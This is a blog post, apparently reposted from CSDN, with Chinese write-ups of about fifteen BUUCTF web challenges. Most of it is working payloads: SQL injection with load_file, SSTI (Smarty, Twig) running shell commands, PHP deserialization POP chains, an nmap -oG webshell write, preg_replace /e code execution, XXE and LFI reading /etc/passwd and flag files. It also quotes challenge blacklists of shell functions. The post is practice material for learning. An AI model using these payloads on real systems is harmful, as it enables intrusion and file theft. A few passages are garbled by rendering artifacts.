本文介绍: 关于第二页的前半部分的解题

[网鼎杯 2018]Fakebook

注册一个账户,进去之后查看源代码,感觉存在注入
image.png
数字型注入payload

1%20and(false)
1%20and(true)

image.png
image.png
判断列数

1 order by 5

image.png
改为4的时候页面正常
image.png
判断显示位,可以看见第二列存在数据回显

0 union/**/select 1,2,3,4

image.png
查看执行权限路径

0%20union/**/select%201,@@global.secure_file_priv,3,4

返回空值,意味着可以读取或者写入任意路径文件
image.png
使用load_file函数读取flag文件

0%20union/**/select%201,load_file("/var/www/html/flag.php"),3,4

查看源码,获得flag
image.png

[RoarCTF 2019]Easy Java

访问链接地址可以发现一个登录页面
image.png
感觉怪怪的,先看一眼源码,就发现突破点了
image.png
访问可以发现出现报错
image.png
更改数据包,把GET请求方式改为POST,发现成功下载help.docx
image.png
打开help.docx文档可以发现提示说明我们需要下载关键的文件才行。
image.png
因为根据题目提示JAVA,使用尝试利用下载WEB-INF/web.xml文件可以看见成功了
image.png

java网站目录结构

src存放项目的Java源代码src/com/example/web/:Java源代码根目录可能按照包构组织。

webapp(或者WebContent): 包含Web应用程序的资源文件。
webapp/WEB-INF/:包含配置部署描述文件。
webapp/WEB-INF/web.xml:Web应用部署描述文件包含Servlet和其他配置信息。
webapp/WEB-INF/classes/:编译后的Java文件。
webapp/WEB-INF/lib/:存放项目依赖的JAR文件。
webapp/WEB-INF/jsp/:存放JSP文件。

根据回显,可以看见是要获取编译后的Java文件
image.png
所以构造payload

/Download?filename=/WEB-INF/classes/com/wm/ctf/FlagControlle.class

image.png
可以发现flag就是这串 base64 编码
image.png

[BJDCTF2020]The mystery of ip

访问链接,直接进入主题。根据题目提示说明ip存在猫腻
image.png
数据包添加请求头:

X-Forwarded-For:127.0.0.1

image.png
可以看见X-Forwarded-For:是一个可控点,我们可以利用这个请求头来进行其他操作
image.png
最终测试出,存在SSTI模板注入

{{8*8}}

通过FUZZ爆破发现是Smarty模板的SSTI漏洞最后使用payload

{{system("cat /flag")}}

image.png
可以看见成功获取flag

[网鼎杯 2020 朱雀组]phpweb

进入网页后,可以发现,有些奇怪的信息突然出现在页面
image.png
抓包看看,可以发现是调用php函数才导致的
image.png
既然我们知道了可以调用函数实现日期的回显,那么我们利用可控变量修改函数,来读取index.php看看

func=file_get_contents&p=index.php

image.png
通过读取源码,发现禁用了许多可以执行命令函数

   <?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

但是我们可以看见下面的类:

   class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

其他代码不用管,因为影响不大。如果要想绕过禁用函数,那么就要执行序列为什么呢?因为反序列化 unserialize() 对单一的已序列化变量进行操作,将其转换回 PHP 的值。
从而构造payload:

<?php
   class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
   }
   $a = new Test();
   $a -> func ="system";
   //$a -> p = "find / -name 'flag*'";
   $a -> p ="cat /tmp/flagoefiu4r93";
   echo serialize($a);
?>

查找flag路径

func=unserialize&amp;p=O:4:"Test":2:{s:1:"p";s:20:"find / -name 'flag*'";s:4:"func";s:6:"system";}

image.png
获取flag

func=unserialize&amp;p=O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}:6:"system";}

image.png

[BSidesCF 2020]Had a bad day

进入网页之后,可以看见有两个按钮可以点击
image.png
通过观察可以发现,浏览器多了个参数进行请求,每次刷新页面猫猫的图片都会换掉
image.png
因此推测不是sql注入漏洞应该是文件包含漏洞,使用php协议可以发现成功读取文件

php://filter/convert.base64-encode/resource=index

image.png
因为报错信息可以发现php是有两个的,那么我们删掉.php就好了。
image.png
base64解码得到index.php源码

<?php
  $file = $_GET['category'];
if(isset($file))
{
  if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
    include ($file . '.php');
  }
  else{
    echo "Sorry, we currently only support woofers and meowers.";
  }
}
?>

通过代码审计,可以看见要想包含想要的文件,就必须通过if判断。那么我们要包含flag文件在哪里呢?
通过目录扫描得知是flag.php 文件
从而构造payload:

?category=meowers/../flag

可以发现验证成功
image.png
最后利用php协议就可以成功读取到了flag.php 的源代码

?category=php://filter/convert.base64-encode/resource=meowers/../flag

image.png
base64解码获得flag
image.png

[BUUCTF 2018]Online Tool

进入页面后开始审计源码:

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

通过观察可以发现最重要的函数就是

escapeshellarg
escapeshellcmd

绕过原理

<?php

echo "一开始的字符串:".$a= "'hell";
echo "<br>是escapeshellarg函数:".$b = escapeshellarg($a);
echo "<br>是escapeshellcmd函数:".escapeshellcmd($a);
echo "<br>两个函数一起的结果:".escapeshellcmd($b);

开头 hell 的首位添加一个单引号,通过观察可以发现最终两个函数的结果单引号没有闭合导致不能执行恶意代码
image.png
通过观察可以发现是单引号引起了转义,当 ‘hell 后面再次添加一单引号时候就会闭合
image.png
知道了闭合单引号,也意味着我们可以控制变量参数了。

//?$host=payload
//?host='执行的关键payload '
//末尾单引号前面还要多空出一格

由于nmap的 -oG 参数可以导出文件,利用这点构造以下payload:

?host='<?php echo `cat /flag`;?> -oG a.php '

image.png
最后访问生成的php文件获得flag

xxx.buooj.cn:81/73d2515c6cc128eff4ed44689ccbe7e6/a.php

image.png

[BJDCTF2020]ZJCTF,不过如此

进入页面先审计源码:

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&amp;&amp;(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

主要看第六行代码,当

t

e

x

t

变量等于

I

h

a

v

e

a

d

r

e

a

m

,同时

f

i

l

e

g

e

t

c

o

n

t

e

n

t

s

函数将会读取

text 变量等于 I have a dream ,同时file_get_contents函数将会读取

text变量等于Ihaveadream,同时filegetcontents函数将会读取text 变量,它们两个进行对比是否等于 I have a dream。我们只需要让text变量等于这个英文字符串即可
这里使用data协议,当然也可以php://input 协议,构造以下payload:

?text=data://text/plain,I have a dream

可以看见我们的页面并没有报错,已经成功的运行到了file_get_contents 函数,这也意味着我们也可以控制下面的file变量
image.png
然后php伪协议读取 next.php 提示文件的源码:

?text=data://text/plain,I have a dream&amp;file=php://filter/convert.base64-encode/resource=next.php

image.png
最后base64 解码获取源码:

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

这里主要考点是 preg_replace 的一个RCE漏洞

preg_replace( '/(' . $re . ')/ei','strtolower("\1")', $str);

主要是构造:

preg_replace('.*')/ei','strtolower("\1")', {${此处填函数名}});

所以我们要做的就是换一个正则表达式,让其匹配到 {${phpinfo()}} 即可执行 phpinfo 函数。
payload:

?S*=${phpinfo()}

image.png
根据此原理条件下,我们剩下想要执行命令简单的多了,使用源码自带的函数获取flag。通过调用getFlag()函数,然后执行命令
image.png

?S*=${getFlag()}&amp;cmd=system('cat /flag');

image.png

这个是我自己想的getshell思路,感觉这个更方便点。也可以使用系统自带命令执行

?S*=${system($_GET[c])}&amp;c=cat /flag

image.png

花式绕过

?S*=${system(chr(99).chr(97).chr(116).chr(32).chr(47).chr(102).chr(108).chr(97).chr(103))}

image.png
关于preg_replace漏洞的产生,可以参考这篇:

https://xz.aliyun.com/t/2557

[GXYCTF2019]禁止套娃

信息收集

首先进入页面,通过页面的信息抓包发现没有任何可以利用的东西,猜测可能是需要目录扫描
image.png
果不其然,成功扫出来了 是git泄露
使用工具GitHack

https://github.com/lijiejie/GitHack

image.png
可以看见已经获得了一个index.php 的源码文件:

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data://|filter://|php://|phar:///i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+((?R)?)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

代码审计

现在最重要的代码审计,如何获得eval可控变量?进行shellcode 注入
image.png
我们主要看这三行代码

   if (!preg_match('/data://|filter://|php://|phar:///i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+((?R)?)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
'/[a-z,_]+((?R)?)/'
// 这个可能很难理解,但其实不是的。
// 例如 a-z的引文字符母和下划线 _ 最后通过连接符号 + 上括号 () 
// ?R 里面的意思递归。至于递归什么,递归的是刚刚说的那些,例如a(b(c()))
// a()里面包含着b(),以此类推就是这个意思

构造payload

array数组

现在我们了解那么多,就可以开始自己造轮子来代替平时的函数以达到我们的目的:只能通过函数,而不再函数里面使用双引号字符串
查看当前路径下的文件,以数组方式打印

?exp=print_r(scandir(pos(localeconv())));

// scandir — 列出指定路径中的文件和目录
// poscurrent函数的别名current用来返回当前数组当前单元
// localeconv — 获取数格式信息,在这里它的作用可以代替路径 ./

image.png
发现flag.php 在倒数第二行。
在php函数中刚好可以利用 next函数与 array_reverse函数进行利用,最后通过show_source 高亮显示文件成功读取到flag.php:

?exp=show_source(next(array_reverse(scandir(pos(localeconv())))));

// next — 将数组中的内部指针向前移动一位
// array_reverse — 返回单元顺序相反的数组

image.png
当 flag.php 的数组位置随机,可以使用 array_rand函数与array_flip函数,以下payload,一直刷新页面flag就会回显:

?exp=show_source(array_rand(array_flip(scandir(current(localeconv())))));

image.png

array_rand()返回的是数组名称,而array_flip()函数的作用是通过数组名称来获得数组值
这两个函数互相搭配,就可以通过数组名称来获得到数组的值了
session_id()

这种RCE的方式,主要是通过 session 来帮助命令执行的。
image.png
因为我们可以通过这些函数来控制可控变量,而session_id 的作用就是获取当前会话的ID,也就是cookie中的phpsession,我们可以通过抓包修改其值,从而注入shellcode

因为 phpsession 只允许 a-z A-Z 0-9 "。" "-" 所以我们必须转换为十六进制,才能RCE。
而session_id必须要开启session才可以使用,所以我们要使用session_start()函数。

RCE的payload:

?exp=eval(hex2bin(session_id(session_start())));

image.png
image.png
执行不了,是因为第二行代码,它不支持数字

if(';' === preg_replace('/[a-z,_]+((?R)?)/', NULL, $_GET['exp'])) {

不过不影响获得flag:

?exp=show_source(session_id(session_start()));

// Cookie:PHPSESSID=flag.php

image.png
其他的无参数rce,具体可以看看这篇:

https://blog.csdn.net/weixin_46330722/article/details/110840156

[NCTF2019]Fake XML cookbook

根据题目提示可以看见是关于XML,想起XML语言标记文本就会联想到XXE漏洞,具体可以参考我之前写过的一篇文章这里就不再赘述基础知识了。

https://blog.csdn.net/weixin_53912233/article/details/129077736

首先打开burp suite进行抓包,可以发现是XML语言
image.png
尝试一下payload:

<!DOCTYPE cike[<!ENTITY xxe SYSTEM "file:///flag">]>
<user><username>&amp;xxe;</username><password>a</password></user>

发现直接给出了回显,证实了存在漏洞的利用性
image.png
剩下的就是读取flag文件就成功了,根据数据的flag.php提示
image.png
最终试出来了flag的具体位置,下面是payload:

<!DOCTYPE cike[<!ENTITY xxe SYSTEM "file:///flag">]>
<user><username>&amp;xxe;</username><password>a</password></user>

[GWCTF 2019]我有一个数据库

通过目录扫描发现一个phpmyadmin后台地址
image.png
然后搜索历史漏洞,可以发现poc

?target=db_sql.php%253f/../../../../../../../../etc/passwd

image.png
获取flag:

?target=db_sql.php%253f/../../../../../../../../flag

image.png

[BJDCTF2020]Mark loves cat

通过目录扫描发现存在 .git 泄露
image.png
然后使用工具GitHack 获得了源码,index.php 源码:

<?php

include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){  
    $$x = $$y;
}

foreach($_GET as $x => $y){     
    if($_GET['flag'] === $x &amp;&amp; $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) &amp;&amp; !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}



echo "the flag is: ".$flag;

flag.php 的源码:

<?php
	$flag = file_get_contents('/flag');

可以看见要想输出echo函数,就要绕过三个if判断,但是陷入不太可能。
突破点就是exit()函数,当调用此函数的时候,里面的变量将会执行。
所以我们只需要想办法进行变量覆盖执行这一段,让$yds变量等于flag:

if(!isset($_GET['flag']) &amp;&amp; !isset($_POST['flag'])){
    exit($yds);
}

其中foreach语句的意思是:

foreach($_GET as $x => $y){  // $x 表示每个传递过来的参数名,而 $y 则表示对应参数名的值。
$$x = $$y;
													}
	所以我们输入的变量是 yds = flag ,
	$x=yds $y=flag,
	$$x = $$y 
	所以 $yds=$flag
	所以当 $yds = $flag 时,就会调用exit($yds); 等同于 echo $flag;因为头部包含了flag.php

从而构造payload:

?yds=flag

image.png
而且一开始主页就有提示了,一个dog回显
image.png
查看源代码,可以看见dog是 $yds的变量
image.png
所以当我们替换dog为flag就会输出flag

第二个payload构造,可以看见我们需要触发is变量,前提条件是满足flag=flag或者使用post请求

foreach($_GET as $x => $y){
    $$x = $$y;
}


if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}

所以我们构造payload:

?is=flag&flag=flag

image.png
至于is为什么要等于flag,原理也是和 yds 变量一样,它们都是通过 foreach语句。变成可可变量了。而三个if所执行的exit()函数里面的变量都是不同的。
第三个payload:

?handsome=flag&flag=x&x=1
// 这里不一定是 x变量也可以改
?handsome=flag&flag=a&a=1

原理是为了绕过第一个if判断,所以

f

l

a

g

=

flag=

flag=x变量里的值,而x不能等于flag,所以在需要一个$x传入变量

foreach($_GET as $x => $y){
    $$x = $$y;
}


foreach($_GET as $x => $y){    
    if($_GET['flag'] === $x && $x !== 'flag'){ 
			// x变量不能等于flag,且flag变量要等于x变量,所以可以通过if判断。
        exit($handsome);
    }

image.png
payload4:
还有一个解法,我觉得应该算是php弱数组:
image.png
因为foreach,输出的都是数组,那么我们不仅可以利用变量覆盖,还可以利用php的数组的特性如:

?13=flag&flag=13

image.png

[WUSTCTF2020]朴实无华

通过信息收集发现存在robots.txt 文件
image.png
访问这个php,回显了一个flag不在这?
image.png
抓包发现,返回包头存在提示
/fl4g.php
image.png
然后又是一个php审计:
image.png

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>
去非洲吧

level 1绕过 intval:

if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}

绕过条件是满足num变量小于2020,当+1时要大于2021,这里有一个函数 intval,当数字存在字母e时进行计算会变成科学计算法,因为这里的比较是弱类型比较,所以可以使用字母

其中 e 表示乘以 10 的幂。所以 202e9 实际上表示的是 202 乘以 10 的 9 次方,也就是 202 亿。

所以成功绕过了这个if判断,payload:

?num=202e9

image.png
level 2

if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

可以看见是md5的弱类型比较,==在比较数据的时候会进行类型的转换,我们只需要找到对应数值就好了:

?num=20e09&md5=0e807097110

image.png
level3:

if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>

可以看见传入get_flag 变量之后,strstr 函数检查该值是否包含空格。如果没有空格,它将使用 str_ireplace 函数将字符串中的 “cat” 替换为 “wctf2020”。
payload:

?num=20e09&md5=0e807097110&get_flag=ls // 查看当前目录
?num=20e09&md5=0e807097110&get_flag=cat${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
//   等于空变量 ${IFS}等于空格

image.png

[BJDCTF2020]Cookie is so stable

进入网页,直接来到提示,点击FLAG
image.png
根据提示说cookie,我们抓包看看
image.png
image.png
发现cookie里面有个user参数等于a,再放包可以发现页面回显了个字母a
image.png
经过测试,推测出是SSTI模板注入的漏洞,payload:

{{8*8}}

image.png
回显出了64的数字
serverside.png
通过这幅图的payload测试,可以推测出可能是 Twig模板,或者Jinja2模板
最终测试出是Twig 模板payload:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

image.png

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

image.png

[安洵杯 2019]easy_web

进入页面可以通过观察这是一个base64 的编码,可以发现是img参数接受的,感觉很奇怪。
image.png
因此推测出可能是来显示页面中的图片,通过解码发现:
base64 -> base64 -> hexe -> text
image.png
最后发现是源文件是555.png,按照这种思路尝试把555.png 改为 index.php 然后进行反向编码
hex -> base64 -> base64

?img=TmprMlJUWTBOalUzT0RKRk56QTJPRGN3&cmd=

可以发现有base64编码后的字符串
image.png
base64解码得出源码

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|'|"|`|;|,|*|?|\|\\|n|t|r|xA0|{|}|(|)|&[^d]|@|||\$|[|]|{|}|(|)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>

通过观察代码可以发现是RCE执行,才能获取flag,那么我们需要绕过这两段关键代码:

if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|'|"|`|;|,|*|?|\|\\|n|t|r|xA0|{|}|(|)|&[^d]|@|||\$|[|]|{|}|(|)|-|<|>/i", $cmd)) {
	  echo("forbid ~");
    echo "<br>";

if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;

其中最重要的post传参的a和b,因为它们是强类型比较MD5值相等,且转换为字符串类型的值不能相等。
因为传入的必须是字符串,就不能拿数组绕过了。
至于MD5碰撞相等的方法可以具体参考这一篇文章

https://blog.csdn.net/shuaicenglou3032/article/details/118197904

现在进行构造数据包,可以发现成功执行命令
image.png

a=%D11%DD%02%C5%E6%EE%C4i%3D%9A%06%98%AF%F9%5C/%CA%B5%87%12F~%AB%40%04X%3E%B8%FB%7F%89U%AD4%06%09%F4%B3%02%83%E4%88%83%25qAZ%08Q%25%E8%F7%CD%C9%9F%D9%1D%BD%F2%807%3C%5B%D8%82%3E1V4%8F%5B%AEm%AC%D46%C9%19%C6%DDS%E2%B4%87%DA%03%FD%029c%06%D2H%CD%A0%E9%9F3B%0FW~%E8%CET%B6p%80%A8%0D%1E%C6%98%21%BC%B6%A8%83%93%96%F9e%2Bo%F7%2Ap&b=%D11%DD%02%C5%E6%EE%C4i%3D%9A%06%98%AF%F9%5C/%CA%B5%07%12F~%AB%40%04X%3E%B8%FB%7F%89U%AD4%06%09%F4%B3%02%83%E4%88%83%25%F1AZ%08Q%25%E8%F7%CD%C9%9F%D9%1D%BDr%807%3C%5B%D8%82%3E1V4%8F%5B%AEm%AC%D46%C9%19%C6%DDS%E24%87%DA%03%FD%029c%06%D2H%CD%A0%E9%9F3B%0FW~%E8%CET%B6p%80%28%0D%1E%C6%98%21%BC%B6%A8%83%93%96%F9e%ABo%F7%

由于是post请求,还需添加这个请求头,用于表示post请求编码的格式:

Content-Type:application/x-www-form-urlencoded

现在只需要绕过命令执行就可以

ls
ls%20/

查看根目录文件,反斜杠可以绕过空变量,%20用于绕过空格
image.png
最后读取flag

cat%20/flag

image.png

[MRCTF2020]Ezpop

访问页面可以是关于反序列化的题,如图
image.png
我们可以从第一个类开始分析

class Modifier {
	// protected定义的变量反序列化之后,输出的字符串为不可显,需要urlencode进行编码输出
    protected  $var;
	//可以看见这里有一个include函数,可以进行文件包含漏洞,来进行读取flag.php文件
    public function append($value){
        include($value);
    }
	//调用include函数,必须使用__invoke()方法:当尝试调用函数的方式调用一个对象时,_invoke()方法会自动调用函数
    public function __invoke(){
        $this->append($this->var);
    }
}

通过分析,我们必须要调用函数的方式调用一个对象,才能利用 include()函数来读取flag.php文件。

在最后一个类进行分析,发现存在调用__invoke()的方式

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }
//读取不可访问protected 或 private)或不存在的属性的值时,__get() 会被调用。
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

可以看见第9行,return函数意味着调用函数。为了可以执行__get函数,我们需要读取和不可访问protected 或 private)或不存在的属性的值。

现在分析中间的show类:

class Show{
    public $source;
    public $str;
	//这个不重要,只是输出xxx,决定不了什么
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
	//当输出引用这个类的时候,将会调用__toString(),就会返回这些属性值给全局进行使用
    public function __toString(){ 
        return $this->str->source;
    }
	//在这里可以看见echo输出函数,后面调用__toString()将会用到这里的source属性。
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|../i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

现在知道了 include()来自Modifie类—->Test()的__get()调用方法—->使用Show()__toString()来构造不存在的属性和值
开始构造pop链:

所以创建新类的顺序为:
Show()->Test()->Modifie()

php生成序列化脚本

<?php
class Modifier {
    protected  $var = "php://filter/convert.base64-encode/resource=flag.php";
}

class Show{
    public $source;
    public $str;
}

class Test{
    public $p;
}

// 初始化创建Show()的类为a变量 
$a = new Show();
// 将source属性添加到 Show()类中,因为这样子就可以使用到echo函数,也会调用__toString()方法
$a->source= new Show();  
// Test()类的__get()方法,为了可以调用,我们将属性调转过来
$a->source->str= new Test();
// 最后将全部的属性指定到p中,放入Modifier()类,才能执行__invoke()方法,即调用include()函数
$a->source->str->p = new Modifier();

// 输出反序列化,以url编码,这是为了显示protected变量的不可回显的字符
echo urlencode(serialize($a));

最后生成payload:

O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A52%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D

以pop参数接受payload
image.png
base64解码获得flag
image.png

原文地址:https://blog.csdn.net/weixin_53912233/article/details/134754252

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任

如若转载,请注明出处:http://www.7code.cn/show_30096.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱suwngjj01@126.com进行投诉反馈,一经查实,立即删除

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注